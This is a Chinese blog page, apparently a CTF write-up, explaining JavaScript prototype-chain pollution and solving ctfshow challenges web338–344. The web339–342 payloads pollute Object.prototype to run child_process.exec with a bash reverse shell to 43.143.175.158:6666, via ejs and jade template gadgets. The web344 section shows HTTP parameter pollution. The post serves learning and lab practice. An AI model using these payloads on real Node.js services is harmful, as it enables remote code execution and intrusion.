
<!DOCTYPE html>
<html lang="zh-CN ">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hoylindo || js原型污染</title>
    <meta name="author" content="hoylindo">
    <meta name="description" content="嗨，这里是一个搭建的不太熟练的小破站 ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/1.jpg">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/maiden-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<meta name="generator" content="Hexo 5.4.2"></head>

<body>

    <div id="loading"
        style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div
            style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent"
                style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#fba3cf; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p>dadada~</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">Hoylindo</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled" />
            </span>
            <span>home</span>
        </a>
        
        <a href="/about">
            <span>
                <a-icon type="idcard" theme="filled" />
            </span>
            <span>about</span>
        </a>
        
        <a href="/archives">
            <span>
                <a-icon type="folder" theme="filled" />
            </span>
            <span>archives</span>
        </a>
        
        <a href="/categories">
            <span>
                <a-icon type="book" theme="filled" />
            </span>
            <span>categories</span>
        </a>
        
        <a href="/tags">
            <span>
                <a-icon type="tags" theme="filled" />
            </span>
            <span>tags</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled" />
            </span>
            <span>Hoylindo</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="idcard" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="folder" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="book" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">categories</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="tags" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">tags</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1>js原型污染 </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled" />
            </span>
            2023/8/19
        </span>

        
        <span class="category">
            <a href="/categories/CTF">
                <span class="icon">
                    <a-icon type="book" theme="filled" />
                </span>
                CTF
            </a>
        </span>
        

        

        <span class="tags">
            <span class="icon">
                <a-icon type="tags" theme="filled" />
            </span>
            
            <span class="tag">
                
                <a href="/tags/Nodejs" style=color:#ffa2c4>
                    Nodejs
                </a>
            </span>
            
        </span>
        
    </div>

    <div class="content" v-pre>
        <br>

<span id="more"></span>

<h3 id="js特点"><a href="#js特点" class="headerlink" title="js特点"></a>js特点</h3><ul>
<li><p>定义一个类，要以定义<strong>构造函数</strong>的方式来定义：</p>
<pre><code class="javascript">function Foo() &#123;
    this.bar = 1
&#125;

new Foo()
</code></pre>
</li>
<li><p><code>Foo</code>函数的内容，就是<code>Foo</code>类的构造函数，<code>this.bar</code>就是<code>Foo</code>类的一个属性</p>
</li>
<li><p>可以将类的方法定义在构造函数内部：</p>
<pre><code class="javascript">function Foo() &#123;
    this.bar = 1
    this.show = function() &#123;
        console.log(this.bar)
    &#125;
&#125;

(new Foo()).show()
</code></pre>
</li>
<li><p>这样写每当新建一个<code>Foo</code>对象时，<code>this.show = function…</code>就会执行一次，这个show方法实际上是绑定在对象上的，而不是绑定在类中</p>
</li>
<li><p>在创建类的时候只创建一次show方法，需要使用<strong>原型</strong>（prototype）：</p>
<pre><code class="javascript">function Foo() &#123;
    this.bar = 1
&#125;

Foo.prototype.show = function show() &#123;
    console.log(this.bar)
&#125;

let foo = new Foo()
foo.show()
</code></pre>
</li>
<li><p>可以认为原型<code>prototype</code>是类<code>Foo</code>的一个属性，而所有用<code>Foo</code>类实例化的对象，都将拥有这个属性中的所有内容，包括变量和方法</p>
</li>
<li><p>可以通过<code>Foo.prototype</code>来访问<code>Foo</code>类的原型，但<code>Foo</code>实例化出来的对象，不能通过<code>prototype</code>访问原型</p>
</li>
<li><p>Foo类实例化出来的foo对象，可以通过<code>foo.__proto__</code>属性来访问Foo类的原型：</p>
<pre><code class="javascript">foo.__proto__ == Foo.prototype
</code></pre>
</li>
<li><p>prototype是一个类的属性，所有类对象在实例化的时候将会拥有prototype中的属性和方法</p>
</li>
<li><p>一个对象(foo)的<code>__proto__</code>属性，指向这个对象所在的类(Foo)的prototype属性</p>
</li>
</ul>
<h3 id="JavaScript原型链继承"><a href="#JavaScript原型链继承" class="headerlink" title="JavaScript原型链继承"></a>JavaScript原型链继承</h3><ul>
<li><p>所有类对象在实例化的时候将会拥有<code>prototype</code>中的属性和方法，这个特性被用来实现<code>JavaScript</code>中的继承机制</p>
<pre><code class="javascript">function Father() &#123;
    this.first_name = &#39;Donald&#39;
    this.last_name = &#39;Trump&#39;
&#125;

function Son() &#123;
    this.first_name = &#39;Melania&#39;
&#125;

Son.prototype = new Father()

let son = new Son()
console.log(`Name: $&#123;son.first_name&#125; $&#123;son.last_name&#125;`)
//输出：Name: Melania Trum
</code></pre>
</li>
<li><p>对象son，在调用son.last_name的时候，实际上JavaScript引擎会进行如下操作：</p>
<ul>
<li>在对象son中寻找last_name</li>
<li>如果找不到，则在<code>son.__proto__</code>中寻找last_name</li>
<li>如果仍然找不到，则继续在<code>son.__proto__.__proto__</code>中寻找last_name</li>
<li>依次寻找，直到找到null结束，Object.prototype的<code>__proto__</code>就是null</li>
</ul>
</li>
<li><p>JavaScript的查找机制，被运用在面向对象的继承中，被称作prototype继承链，每个构造函数(constructor)都有一个原型对象(prototype)</p>
</li>
<li><p>对象的<code>__proto__</code>属性，指向类的原型对象prototype，JavaScript使用prototype链实现继承机制</p>
</li>
</ul>
<h3 id="原型链污染"><a href="#原型链污染" class="headerlink" title="原型链污染"></a>原型链污染</h3><ul>
<li><p>举例：</p>
<pre><code class="javascript">// foo是一个简单的JavaScript对象
let foo = &#123;bar: 1&#125;

// foo.bar 此时为1
console.log(foo.bar)

// 修改foo的原型（即Object）
foo.__proto__.bar = 2

// 由于查找顺序的原因，foo.bar仍然是1
console.log(foo.bar)

// 此时再用Object创建一个空的zoo对象
let zoo = &#123;&#125;

// 查看zoo.bar
console.log(zoo.bar)
//虽然zoo是一个空对象&#123;&#125;，但zoo.bar的结果是2
</code></pre>
</li>
<li><p>因为前面修改了foo的原型<code>foo.__proto__.bar = 2</code>，而foo是一个Object类的实例，所以实际上是修改了Object这个类，给这个类增加了一个属性bar，值为2</p>
</li>
<li><p>又用Object类创建了一个zoo对象<code>let zoo = &#123;&#125;</code>，zoo对象自然也有一个bar属性</p>
</li>
<li><p>在一个应用中，如果攻击者控制并修改了一个对象的原型，那么将可以影响所有和这个对象来自同一个类、父祖类的对象，这种攻击方式就是原型链污染</p>
</li>
</ul>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><ul>
<li><p>存在能够控制数组（对象）的键名的操作：对象merge、对象clone（其实内核就是将待操作的对象merge到一个空对象中）</p>
</li>
<li><p>举例：</p>
<pre><code class="javascript">function merge(target, source) &#123;
    for (let key in source) &#123;
        if (key in source &amp;&amp; key in target) &#123;
            merge(target[key], source[key])
        &#125; else &#123;
            target[key] = source[key]
        &#125;
    &#125;
&#125;
</code></pre>
</li>
<li><p>让<code>__proto__</code>被认为是一个键名：</p>
<pre><code class="javascript">let o1 = &#123;&#125;
let o2 = JSON.parse(&#39;&#123;&quot;a&quot;: 1, &quot;__proto__&quot;: &#123;&quot;b&quot;: 2&#125;&#125;&#39;)
merge(o1, o2)
console.log(o1.a, o1.b)

o3 = &#123;&#125;
console.log(o3.b)
</code></pre>
</li>
<li><p><code>let o2 = &#123;a: 1, &quot;__proto__&quot;: &#123;b: 2&#125;&#125;</code>失败，因为用JavaScript创建o2的过程（<code>let o2 = &#123;a: 1, “__proto__”: &#123;b: 2&#125;&#125;</code>）中，<code>__proto__</code>已经代表o2的原型了，此时遍历o2的所有键名，拿到的是[a, b]，<code>__proto__</code>并不是一个key，自然也不会修改Object的原型</p>
</li>
<li><p><code>let o2 = JSON.parse(&#39;&#123;&quot;a&quot;: 1, &quot;__proto__&quot;: &#123;&quot;b&quot;: 2&#125;&#125;&#39;)</code>成功，因为JSON解析的情况下，<code>__proto__</code>会被认为是一个真正的键名，而不代表原型，所以在遍历o2的时候会存在这个键</p>
</li>
<li><p>merge操作是最常见可能控制键名的操作，也最能被原型链攻击，很多常见的库都存在这个问题</p>
</li>
<li><p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41107295/article/details/95789944">https://blog.csdn.net/qq_41107295/article/details/95789944</a></p>
</li>
</ul>
<h3 id="web338"><a href="#web338" class="headerlink" title="web338"></a>web338</h3><ul>
<li><p>login.js：</p>
<pre><code class="javascript">router.post(&#39;/&#39;, require(&#39;body-parser&#39;).json(),function(req, res, next) &#123;
  res.type(&#39;html&#39;);
  var flag=&#39;flag_here&#39;;
  var secert = &#123;&#125;;
  var sess = req.session;
  let user = &#123;&#125;;
  utils.copy(user,req.body);
  if(secert.ctfshow===&#39;36dboy&#39;)&#123;
    res.end(flag);
  &#125;else&#123;
    return res.json(&#123;ret_code: 2, ret_msg: &#39;登录失败&#39;+JSON.stringify(user)&#125;);  
  &#125;
&#125;);
</code></pre>
</li>
<li><p>利用<code>utils.copy</code>方法：</p>
<pre><code class="javascript">function copy(object1, object2)&#123;
    for (let key in object2) &#123;
        if (key in object2 &amp;&amp; key in object1) &#123;
            copy(object1[key], object2[key])
        &#125; else &#123;
            object1[key] = object2[key]
        &#125;
    &#125;
  &#125;
</code></pre>
</li>
<li><p>payload：<code>&#123;&quot;username&quot;:&quot;1&quot;,&quot;password&quot;:&quot;1&quot;,&quot;__proto__&quot;:&#123;&quot;ctfshow&quot;:&quot;36dboy&quot;&#125;&#125;</code></p>
</li>
</ul>
<h3 id="web339"><a href="#web339" class="headerlink" title="web339"></a>web339</h3><ul>
<li><p>改成了</p>
<pre><code class="javascript">if(secert.ctfshow===flag)&#123;
    res.end(flag);
  &#125;
</code></pre>
</li>
<li><p>相等不了，但是多了一个<code>api.js</code>：</p>
<pre><code class="javascript">router.post(&#39;/&#39;, require(&#39;body-parser&#39;).json(),function(req, res, next) &#123;
  res.type(&#39;html&#39;);
  res.render(&#39;api&#39;, &#123; query: Function(query)(query)&#125;);
   
&#125;);
</code></pre>
</li>
<li><p>可以把<code>query</code>覆盖掉然后反弹shell，payload：</p>
<pre><code class="json">&#123;&quot;__proto__&quot;:&#123;&quot;query&quot;:&quot;return global.process.mainModule.constructor._load(&#39;child_process&#39;).exec(&#39;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/43.143.175.158/6666 0&gt;&amp;1\&quot;&#39;)&quot;&#125;&#125;
</code></pre>
</li>
<li><p>访问一下<code>/api</code></p>
</li>
</ul>
<h3 id="web340"><a href="#web340" class="headerlink" title="web340"></a>web340</h3><ul>
<li><p>login.js：</p>
<pre><code class="javascript">router.post(&#39;/&#39;, require(&#39;body-parser&#39;).json(),function(req, res, next) &#123;
  res.type(&#39;html&#39;);
  var flag=&#39;flag_here&#39;;
  var user = new function()&#123;
    this.userinfo = new function()&#123;
    this.isVIP = false;
    this.isAdmin = false;
    this.isAuthor = false;     
    &#125;;
  &#125;
  utils.copy(user.userinfo,req.body);
  if(user.userinfo.isAdmin)&#123;
   res.end(flag);
  &#125;else&#123;
   return res.json(&#123;ret_code: 2, ret_msg: &#39;登录失败&#39;&#125;);  
  &#125;
&#125;);
</code></pre>
</li>
<li><p>两层，反弹shell，payload：</p>
<pre><code class="json">&#123;&quot;__proto__&quot;:&#123;&quot;__proto__&quot;:&#123;&quot;query&quot;:&quot;return global.process.mainModule.constructor._load(&#39;child_process&#39;).exec(&#39;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/43.143.175.158/6666 0&gt;&amp;1\&quot;&#39;)&quot;&#125;&#125;&#125;
</code></pre>
</li>
</ul>
<h3 id="web341"><a href="#web341" class="headerlink" title="web341"></a>web341</h3><ul>
<li><p><a target="_blank" rel="noopener" href="https://evi0s.com/2019/08/30/expresslodashejs-%E4%BB%8E%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93%E5%88%B0rce/">Express+lodash+ejs: 从原型链污染到RCE - evi0s’ Blog</a></p>
</li>
<li><p>利用ejs rce，原理是：<code>opts</code> 对象 <code>outputFunctionName</code> 成员在 express 配置的时候并没有给他赋值，默认也是未定义，即 <code>undefined</code></p>
</li>
<li><p>但是在有原型链污染的前提之下，可以控制基类的成员，给 <code>Object</code> 类创建一个成员 <code>outputFunctionName</code>，这样可以进入 if 语句，并将我们控制的成员 <code>outputFunctionName</code> 赋值为一串恶意代码，从而造成代码注入，在后面模版渲染的时候，注入的代码被执行</p>
</li>
<li><p>payload：</p>
<pre><code class="json">&#123;&quot;__proto__&quot;:&#123;&quot;__proto__&quot;:&#123;&quot;outputFunctionName&quot;:&quot;_tmp1;global.process.mainModule.require(&#39;child_process&#39;).exec(&#39;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/43.143.175.158/6666 0&gt;&amp;1\&quot;&#39;);var __tmp2&quot;&#125;&#125;&#125;
</code></pre>
</li>
</ul>
<h3 id="web342"><a href="#web342" class="headerlink" title="web342"></a>web342</h3><ul>
<li><p>jade原型链污染</p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://lonmar.cn/2021/02/22/%E5%87%A0%E4%B8%AAnode%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E%E7%9A%84%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93%E5%88%86%E6%9E%90/">几个node模板引擎的原型链污染分析 | L0nm4r (lonmar.cn)</a></p>
</li>
<li><p>payload：</p>
<pre><code class="json">&#123;&quot;__proto__&quot;:&#123;&quot;__proto__&quot;: &#123;&quot;type&quot;:&quot;Block&quot;,&quot;nodes&quot;:&quot;&quot;,&quot;compileDebug&quot;:1,&quot;self&quot;:1,&quot;line&quot;:&quot;global.process.mainModule.require(&#39;child_process&#39;).exec(&#39;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/43.143.175.158/6666 0&gt;&amp;1\&quot;&#39;)&quot;&#125;&#125;&#125;
</code></pre>
</li>
<li><p>改<code>Content-Type: application/json</code></p>
</li>
</ul>
<h3 id="web343"><a href="#web343" class="headerlink" title="web343"></a>web343</h3><ul>
<li>跟342一样</li>
</ul>
<h3 id="web344"><a href="#web344" class="headerlink" title="web344"></a>web344</h3><ul>
<li><p>给了源码：</p>
<pre><code class="javascript">router.get(&#39;/&#39;, function(req, res, next) &#123;
  res.type(&#39;html&#39;);
  var flag = &#39;flag_here&#39;;
  if(req.url.match(/8c|2c|\,/ig))&#123;
      res.end(&#39;where is flag :)&#39;);
  &#125;
  var query = JSON.parse(req.query.query);
  if(query.name===&#39;admin&#39;&amp;&amp;query.password===&#39;ctfshow&#39;&amp;&amp;query.isVIP===true)&#123;
      res.end(flag);
  &#125;else&#123;
      res.end(&#39;where is flag. :)&#39;);
  &#125;

&#125;);

&#123;&quot;name&quot;:&quot;admin&quot;,&quot;password&quot;:&quot;ctfshow&quot;,&quot;isVIP&quot;,true&#125;
</code></pre>
</li>
<li><p>HTTP参数污染</p>
</li>
<li><p>HTTP协议中允许同名参数出现多次，例如<code>?a=1&amp;a=2</code> ，有的服务端取的1，有的取的2，不同服务端对同名参数处理都是不一样的</p>
</li>
<li><p>nodejs会把同名参数以数组的形式存储，并且<code>JSON.parse</code>可以正常解析，payload：</p>
<pre><code class="json">?query=&#123;&quot;name&quot;:&quot;admin&quot;&amp;query=&quot;password&quot;:&quot;ctfshow&quot;&amp;query=&quot;isVIP&quot;:true&#125;
</code></pre>
</li>
<li><p>不编码就行</p>
</li>
</ul>

    </div>

    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2022 - 2023 Hoylindo
            <span class="footer-icon">
                <a-icon type="flag" theme="filled" /></span>
            @hoylindo
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <canvas id="background" style="position:fixed;top:0;left:0;width:100vw;height:100vh;pointer-events:none;z-index:-1" ></canvas> 
    <script src="/js/1.js"></script>
    
    <canvas class="fireworks" style="position: fixed; left: 0; top: 0; z-index: 99999999; pointer-events: none;"></canvas>
    <script type="text/javascript" src="/js/aixin.js"></script>
    <script type="text/javascript" src="/js/anime.min.js"></script>
    <script type="text/javascript" src="/js/fireworks.js"></script>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

</body>

</html>